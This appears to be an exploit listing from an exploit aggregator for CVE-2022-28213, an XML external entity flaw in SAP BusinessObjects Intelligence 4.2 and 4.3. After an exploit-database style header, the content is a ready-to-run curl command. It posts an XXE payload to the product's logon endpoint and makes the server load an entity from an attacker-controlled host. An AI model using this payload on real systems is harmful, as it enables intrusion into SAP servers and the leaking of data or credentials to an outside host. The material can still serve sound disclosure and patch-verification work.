Exploit for SAP BusinessObjects Intelligence 4.3 XML Injection CVE-2022-28213

Name: Exploit for SAP BusinessObjects Intelligence 4.3 XML Injection CVE-2022-28213
Rating: 5 (203 reviews)

2022-05-11 | CVSS 5.5

## https://sploitus.com/exploit?id=PACKETSTORM:167046
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)  
# Google Dork: N/A  
# Date: 4/21/2022  
# Exploit Author: West Shepherd  
# Vendor Homepage: https://www.sap.com/  
# Software Link: https://www.sap.com/  
# Version: 4.2 and 4.3  
# Tested on: Windows Server 2019 x64  
# CVE : CVE-2022-28213  
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md  
  
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \  
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %  
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \  
https://example.com/biprws/logon/long